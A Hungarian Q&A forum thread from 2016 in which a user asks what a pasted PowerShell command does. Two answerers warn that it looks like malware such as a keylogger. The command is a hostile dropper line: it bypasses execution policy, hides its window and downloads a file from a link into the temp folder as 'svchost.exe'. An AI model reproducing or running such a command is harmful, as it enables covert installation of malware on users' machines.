Kezdőoldal » Számítástechnika » Programok » Mit csinál ez a parancs?...

Mit csinál ez a parancs? (Powershell)

Figyelt kérdés
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(' [link] '%TEMP%\svchost.exe'

2016. okt. 16. 19:12
 1/2 anonim ***** válasza:

Én nem próbálnám ki. Nem kell nagyon vágni a programozást, elég ha csak tudsz angolul. Ha sorban olvasod: elindul a szkript, letölti a megadott szerverről az .exe fájlt aminek pont ugyanaz a neve mint a többi rendszerfolyamatnak ami közé el tud vegyülni, majd el is indítja azt.

Így ránézésre egy kémprogram, keylogger például. Biztos nem fogja neked senki megnézni, maximum ha írnak róla a neten.

2016. okt. 16. 19:20
 2/2 anonim ***** válasza:
Letölt valami exe fájlt, amit utána futtat is. Hogy mi az az exe, nem tudom, de gyanítom, hogy jobb nem is megtudni, pláne, hogy svchost.exe néven akarja lementeni. Ha egy futtatható állomány rendszerfolyamat nevét veszi fel, attól nem számíthatsz sok jóra :D
2016. okt. 16. 19:21

Kapcsolódó kérdések:

Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu

A weboldalon megjelenő anyagok nem minősülnek szerkesztői tartalomnak, előzetes ellenőrzésen nem esnek át, az üzemeltető véleményét nem tükrözik.
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!